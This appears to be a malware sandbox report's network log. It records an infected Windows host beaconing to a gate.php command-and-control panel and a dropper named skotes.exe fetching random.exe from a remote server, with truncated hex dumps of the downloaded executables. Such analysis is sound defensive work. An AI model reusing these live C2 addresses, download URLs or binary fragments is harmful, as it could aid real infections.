                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.076385975 CET1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.080671072 CET1236INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                                                                                                                                                                                                                                                        Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        32192.168.2.1050030185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.121339083 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.246330023 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:08.555630922 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:07 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        33192.168.2.105003234.107.221.8280504C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.208214998 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:08.295306921 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 18:55:58 GMT
                                                                                                                                                                                                                                                                                        Age: 75190
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:18.399981976 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:28.607425928 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                        Data Ascii:


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        34192.168.2.1050034185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:08.786503077 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:08.908524990 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:10.348419905 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:09 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        35192.168.2.1050035185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:09.224946022 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 31 34 34 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: d1=1014443001&unit=246122658369
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:10.575232029 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:10 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        36192.168.2.1050036185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:10.582787991 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:10.703398943 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.334602118 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:11 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        37192.168.2.105003731.41.244.11807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:10.806689978 CET59OUTGET /files/fate/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.109173059 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:11 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 727552
                                                                                                                                                                                                                                                                                        Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "67594bc0-b1a00"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL$XgN,6@P|z@ld8h4d.textAMN `.rdata<~`V@@.dataL@.rsrc@@.reloc@B.bss0@.bss@
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.109188080 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.109198093 CET1236INData Raw: 89 c7 83 f8 0f 77 2c 90 89 7d c4 c7 45 c8 0f 00 00 00 57 ff 75 e0 8d 45 b4 50 e8 f4 36 00 00 83 c4 0c 01 ef 83 c7 b4 eb 77 66 2e 0f 1f 84 00 00 00 00 00 90 89 7d d8 83 cf 0f 83 ff 17 b9 16 00 00 00 0f 43 cf 81 ff ff 0f 00 00 c7 45 f0 01 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: w,}EWuEP6wf.}CEMrA$PL#FfAP1u}}EEWuVx6E]5MMuEC]ry1tL1fDi[1i
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.109327078 CET1236INData Raw: 00 e8 39 01 00 00 8b 45 e0 83 c4 04 eb 22 90 89 4d dc ff 15 c4 cc 41 00 8b 4d e0 90 89 4d dc 50 68 2d 9f 41 00 e8 15 01 00 00 8b 45 e0 83 c4 08 90 89 45 dc ff 75 d4 e8 39 6f 00 00 8b 75 e0 83 c4 04 90 0f b6 84 35 c4 fe ff ff 8b 55 d0 00 c2 0f b6
                                                                                                                                                                                                                                                                                        Data Ascii: 9E"MAMMPh-AEEu9ou5U5U5MU0BU9UuUEd0^_[]fUeE@EMPhAWEMj
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.109333992 CET896INData Raw: 45 d4 89 c3 83 e3 fc 83 e0 03 31 ff 83 f8 01 74 1e 83 f8 02 74 0e 83 f8 03 75 23 90 0f be 7c 1a 02 c1 e7 10 90 0f be 44 1a 01 c1 e0 08 31 c7 90 0f be 04 1a 31 f8 69 c0 95 e9 d1 5b 31 c6 8b 45 d8 83 f8 10 72 43 8d 50 01 81 fa 00 10 00 00 72 2a 90
                                                                                                                                                                                                                                                                                        Data Ascii: E1ttu#|D11i[1ErCPr*MA) U$ffff.ERP1i[1TWMAEEAEEuuVHAuVH
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.109338999 CET1236INData Raw: 68 d0 20 40 00 6a 00 6a 00 e8 cc 51 00 00 83 c4 18 90 8b 4d e0 89 01 85 c0 0f 84 fd 00 00 00 90 c7 45 d8 00 00 00 00 90 8b 45 d4 8b 30 85 f6 0f 84 fb 00 00 00 e8 65 10 00 00 39 c6 0f 84 fd 00 00 00 90 6a 00 8b 75 e0 ff 76 04 ff 36 e8 fe 0f 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: h @jjQMEE0e9juv6FuAEj@@EMEQjPh"@jj-QEEu9juue
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.109344006 CET1236INData Raw: e8 dc 00 00 00 83 c4 04 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc b8 28 d4 41 00 e9 9d 1f 00 00 cc cc cc cc cc cc b8 a8 d4 41 00 e9 8d 1f 00 00 cc cc cc cc cc cc b8 08 d5 41 00 e9 7d 1f 00 00 cc cc cc cc cc cc b8 64 d5 41 00 e9 6d 1f 00 00 cc
                                                                                                                                                                                                                                                                                        Data Ascii: ](AAA}dAmA]tAMA=A-<AhAUugQYtuaYt]}gaUuY]
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.109354019 CET1236INData Raw: 0c 56 e8 0b fc ff ff 59 59 8b c6 5e 5d c2 04 00 55 8b ec 83 ec 14 56 8b 75 08 ff 34 b5 7c 61 41 00 e8 1f 00 00 00 50 ff 34 b5 98 61 41 00 8d 4d ec e8 02 02 00 00 68 2c d7 41 00 8d 45 ec 50 e8 8d 17 00 00 cc b8 44 e6 41 00 c3 55 8b ec 8b 45 08 8b
                                                                                                                                                                                                                                                                                        Data Ascii: VYY^]UVu4|aAP4aAMh,AEPDAUEUH]UQQVWuupEPAPTYY_^UAVuV;Bu;Eu2^]UQVWy1urAE_^UUVuBN@;Au
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.109548092 CET1236INData Raw: 75 02 5d c3 50 3d 00 10 00 00 72 07 e8 0a 00 00 00 eb 05 e8 f1 f6 ff ff 59 5d c3 55 8b ec 8b 45 08 8d 48 23 3b c8 0f 86 1f f8 ff ff 51 e8 d7 f6 ff ff 59 8b c8 85 c9 74 0b 8d 41 23 83 e0 e0 89 48 fc 5d c3 e9 9c 53 00 00 83 61 04 00 8b c1 83 61 08
                                                                                                                                                                                                                                                                                        Data Ascii: u]P=rY]UEH#;QYtA#H]SaaAALaAUMu*h AEP}UVu1aA^]UQVuubA^UVubA^]UjhL\AdPQSVWA3P
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.109553099 CET896INData Raw: 28 39 03 0f 84 80 00 00 00 8d 46 08 50 ff 15 44 cc 41 00 eb 74 83 7f 04 00 8b 0f 7c 57 7f 04 85 c9 72 51 0b 4f 04 75 05 39 4f 08 7e 47 8d 45 ec 50 e8 dd 00 00 00 8b 07 59 8b 4d f0 3b 4f 04 7c 19 7f 05 39 45 ec 72 12 39 45 ec 75 59 3b 4f 04 75 54
                                                                                                                                                                                                                                                                                        Data Ascii: (9FPDAt|WrQOu9O~GEPYM;O|9Er9EuY;OuTE;G}LE^(9t%FPdAu^(9tFPdAtN,AF,~+u(N,tGuGjjXE3_[M3^UEPpA3]UQQE
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.229001045 CET1236INData Raw: 33 c0 c3 e8 48 05 00 00 e8 7c 04 00 00 50 e8 93 4f 00 00 59 c3 6a 14 68 80 d8 41 00 e8 0a 07 00 00 6a 01 e8 9f 02 00 00 59 84 c0 0f 84 50 01 00 00 32 db 88 5d e7 83 65 fc 00 e8 39 02 00 00 88 45 dc a1 24 f5 41 00 33 c9 41 3b c1 0f 84 2f 01 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: 3H|POYjhAjYP2]e9E$A3A;/uI$AhLAh,AJYYtEh(Ah AJYY$A]uYC39>tV$Yt6WjWA!9>tVYt6O<Y


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        38192.168.2.1050038185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.567730904 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.687510967 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:14.010266066 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:13 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        39192.168.2.105003931.41.244.11807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:13.387056112 CET59OUTGET /files/fate/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:14.712424040 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:14 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 727552
                                                                                                                                                                                                                                                                                        Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "67594bc0-b1a00"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL$XgN,6@P|z@ld8h4d.textAMN `.rdata<~`V@@.dataL@.rsrc@@.reloc@B.bss0@.bss@
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:14.712445974 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:14.712455988 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:14.712486982 CET1236INData Raw: 44 00 00 90 69 04 be 95 e9 d1 5b 89 c1 c1 e9 18 31 c1 69 c1 95 e9 d1 5b 69 ca 95 e9 d1 5b 31 c1 69 44 be 04 95 e9 d1 5b 89 c2 c1 ea 18 31 c2 69 c2 95 e9 d1 5b 69 d1 95 e9 d1 5b 31 c2 83 c7 02 39 fb 75 bf f6 45 e0 04 74 1d 90 69 3c be 95 e9 d1 5b
                                                                                                                                                                                                                                                                                        Data Ascii: Di[1i[i[1iD[1i[i[19uEti<[1i[i[1E1ttu#|D11i[11i[1;uu$U}D$MJLEEEr2P
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:14.712492943 CET1236INData Raw: 9f 41 00 e8 57 00 00 00 83 c4 08 90 8b 45 c4 8d 4d c4 6a 01 ff 10 90 c7 45 c4 44 60 41 00 8d 45 c8 50 e8 06 2f 00 00 83 c4 04 b8 07 16 40 00 83 c4 0c 5d c3 66 66 2e 0f 1f 84 00 00 00 00 00 55 83 ec 0c 83 c5 0c 90 c7 45 c4 44 60 41 00 8d 45 c8 50
                                                                                                                                                                                                                                                                                        Data Ascii: AWEMjED`AEP/@]ff.UED`AEP.]SWV|$A1D$\$$j93SjWVp0;L$1^_[UWVu}A1Ehmd5XAEUj
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:14.712498903 CET1236INData Raw: 00 eb 13 90 ff 75 e0 e8 88 08 00 00 83 c4 04 56 ff 15 48 cc 41 00 90 8b 45 e8 64 a3 00 00 00 00 b0 01 83 c4 4c 5e 5f 5b 5d c3 90 c7 45 f0 03 00 00 00 e8 64 05 00 00 e8 c5 64 00 00 66 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 83 ec 1c 83 c5 0c
                                                                                                                                                                                                                                                                                        Data Ascii: uVHAEdL^_[]Eddffffff.Uu9]Uu]U]@U]@UMa]fff.U]@U]D$t
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:14.712503910 CET1236INData Raw: 7d dc 00 75 05 83 c4 18 5d c3 e8 93 65 00 00 cc cc cc cc cc cc cc cc b8 60 f0 41 00 c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 83 ec 14 89 4d e8 90 89 65 ec c7 45 f8 ff ff ff ff 8d 45 f0 c7 45 f4 10 23 40 00 64 8b 0d 00 00 00 00 89 4d f0 64 a3
                                                                                                                                                                                                                                                                                        Data Ascii: }u]e`AUVMeEEE#@dMdED`AP%}utVEd^]@UPE}tP]IAEhAUSWVUeEEE
